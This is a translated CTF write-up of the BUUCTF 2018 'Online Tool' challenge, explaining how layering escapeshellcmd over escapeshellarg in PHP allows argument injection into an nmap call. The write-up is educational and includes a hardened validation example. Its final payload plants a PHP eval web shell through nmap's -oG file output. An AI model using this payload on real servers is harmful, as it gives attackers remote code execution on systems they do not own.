[Challenge reproduction + code audit] [BUUCTF 2018] WEB Online Tool (RCE from improper use of escapeshellarg and escapeshellcmd)

 Brief introduction

Challenge reproduction: https://github.com/glzjin/buuctf_2018_online_tool (environment: PHP 5.6.40)

Knowledge tested: RCE caused by improper combined use of escapeshellarg and escapeshellcmd

Online platform: https://buuoj.cn (the public CTF platform of Beijing Union University); the challenge can also be found on the internal Yulin College Principal Association CTF training platform.

Process

Simple audit

Opening the page shows the source code. It uses two functions I (a CTF newbie) had never seen, so I went and read the write-ups...

<?php

print_r($_SERVER['HTTP_X_FORWARDED_FOR']);
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    // the client-supplied X-Forwarded-For header overrides REMOTE_ADDR
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
    print("1");
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);   // quote the whole value as one argument ...
    $host = escapeshellcmd($host);   // ... then escape metacharacters again: the misuse this write-up is about
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);   // per-client sandbox directory name
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

 

First, let's understand the two unfamiliar functions.

escapeshellcmd

escapeshellcmd - escape shell metacharacters

escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before it is passed to the exec() or system() functions, or to the backtick operator.

A backslash (\) is inserted before each of the following characters: & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A and \xFF. ' and " are escaped only if they are not paired. On Windows, all of these characters, as well as % and !, are replaced by a space instead.

<?php 
var_dump(escapeshellcmd("xiaohua da wang"));        // xiaohua da wang
echo "<br>";
var_dump(escapeshellcmd("xiaohua 'da' wang"));      // xiaohua 'da' wang     (paired quotes left alone)
echo "<br>";
var_dump(escapeshellcmd("xiaohua '''da' 'wang"));   // xiaohua '''da' \'wang (only the lone quote escaped)
echo "<br>";

Result: only the unpaired (lone) single quote is escaped.

escapeshellarg

escapeshellarg - escape a string to be used as a shell argument

escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes, allowing you to pass a string directly to a shell function and have it treated as a single, safe argument. This function should be used to escape individual arguments to shell functions that come from user input. The shell functions include exec(), system() and the backtick operator.

<?php 
var_dump(escapeshellarg("xiaohua da wang"));        // 'xiaohua da wang'
echo '<br>';
var_dump(escapeshellarg("xiaohua 'da' wang"));      // 'xiaohua '\''da'\'' wang'
echo '<br>';
var_dump(escapeshellarg("xiaohua '''da' wang"));    // 'xiaohua '\'''\'''\''da'\'' wang'
echo '<br>';

Result: every single quote that appears is escaped (each ' becomes '\'') and the whole string is wrapped in single quotes.

So the difference between escapeshellcmd and escapeshellarg is that the former only escapes lone (unpaired) single quotes, while the latter escapes every single quote; the former additionally escapes a set of special characters, namely:

& # ; ` | * ? ~ < > ^ ( ) [ ] { } $ 
<?php 
var_dump(escapeshellcmd("& # ; ` | * ? ~ < > ^ ( ) [ ] { } $"));   // \& \# \; \` \| \* \? \~ \< \> \^ \( \) \[ \] \{ \} \$
echo "<br>";

 

Reference: https://paper.seebug.org/164/

Walk-through from that paper. The parameter passed in is: 172.17.0.2' -v -d a=1
After escapeshellarg() it becomes '172.17.0.2'\'' -v -d a=1': the single quote is escaped first, and then the left and right parts are each wrapped in single quotes so that the pieces are joined into one argument.
After escapeshellcmd() it becomes '172.17.0.2'\\'' -v -d a=1\', because escapeshellcmd() escapes the \ and, at the end, the unpaired single quote: http://php.net/manual/zh/function.escapeshellcmd.php
The command finally executed is curl '172.17.0.2'\\'' -v -d a=1\'. The \\ in the middle is interpreted by the shell as a literal \ rather than as an escape character, so the ' after it is not escaped and instead pairs with the following ' to form an empty string that joins the pieces. The command therefore reduces to curl 172.17.0.2\ -v -d a=1', i.e. a request to 172.17.0.2\ with POST data a=1'.
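To make the walk-through above and the difference between the two functions concrete, here is an added PHP example (my own, not code from the original post, the seebug paper or the challenge repository). It runs the paper's input through escapeshellarg() alone and through the challenge's escapeshellarg()+escapeshellcmd() order, and has /bin/sh print the resulting argument vector one entry per line, using printf instead of curl or nmap so nothing is contacted. It then shows a hardened way to handle the host value: validate it as an IP address or hostname that cannot begin with -, and quote it once with escapeshellarg(). The function names doubleEscape, shellArgv and safeHostArg are assumptions made for this example; filter_var(), preg_match(), exec(), escapeshellarg() and escapeshellcmd() are standard PHP.

```php
<?php
// Added example, not from the original post or the challenge repository.
// Requires PHP >= 7.0 and a POSIX /bin/sh (exec() runs the command through it).

// The order used by the challenge: quote with escapeshellarg(), then escape again.
function doubleEscape(string $input): string {
    return escapeshellcmd(escapeshellarg($input));
}

// Let /bin/sh split the command tail and print one argument per line, so we can see
// exactly what a program such as curl or nmap would receive in argv.
function shellArgv(string $tail): array {
    $lines = [];
    exec("printf '%s\\n' " . $tail, $lines);
    return $lines;
}

// Hardened host handling (assumed helper name): accept only an IP address or a hostname
// whose first character is alphanumeric, so the value can never be read as an option
// such as -oG, then quote it ONCE. escapeshellcmd() is never layered on top of it.
function safeHostArg(string $host): string {
    $isIp   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $isName = preg_match('/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/', $host) === 1;
    if (!$isIp && !$isName) {
        throw new InvalidArgumentException('host must be an IP address or hostname');
    }
    return escapeshellarg($host);
}

$input = "172.17.0.2' -v -d a=1";   // the input from the seebug paper walk-through

echo "escapeshellarg():                  " . escapeshellarg($input) . "\n";
echo "escapeshellarg()+escapeshellcmd(): " . doubleEscape($input) . "\n\n";

echo "argv with escapeshellarg() only (a single argument, quote kept literal):\n";
foreach (shellArgv(escapeshellarg($input)) as $a) {
    echo "  [$a]\n";
}

echo "argv after escapeshellarg()+escapeshellcmd() (quoting broken, extra options appear):\n";
foreach (shellArgv(doubleEscape($input)) as $a) {
    echo "  [$a]\n";
}

echo "\nhardened handling:\n";
foreach (["172.17.0.2", "scanme.nmap.org", $input, "-oG"] as $candidate) {
    try {
        echo "  " . var_export($candidate, true) . " -> " . safeHostArg($candidate) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  " . var_export($candidate, true) . " -> rejected: " . $e->getMessage() . "\n";
    }
}
```

With escapeshellarg() alone the whole value, quote included, arrives as one argument; after the second pass the shell sees 172.17.0.2\ followed by -v, -d and a=1' as separate arguments, which is the break-out the paper describes. The validation in safeHostArg() is the real fix: escaping is only a last line of defence, and a feature that scans a host never needs to accept quotes or a leading dash in the first place.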

nmap parameters: https://blog.csdn.net/qq_26090065/article/details/80285088

nmap has an -oG option that writes the scan results to a file in grepable format, so a file write can be obtained through the nmap command.

The final payload

So the arguments of the executed command are under our control! Next, write them to a file:

?host=' <?php @eval($_POST["xiaohua"]);?> -oG xiaohua.php '

 

The page displays the generated sandbox folder name; append it and the file name to the URL and visit it:

http://6b6aa4fa-cc55-4b5d-8dd9-9ba66a236355.node3.buuoj.cn/4d484018dc3b664c4cc70a3ef2b8e7a3/xiaohua.php

 

Further reading: Online Tool (BUUCTF 2018)

    PHP escapeshellarg()+escapeshellcmd() 之殇 (the woes of PHP escapeshellarg()+escapeshellcmd())


Source: www.cnblogs.com/xhds/p/12484510.html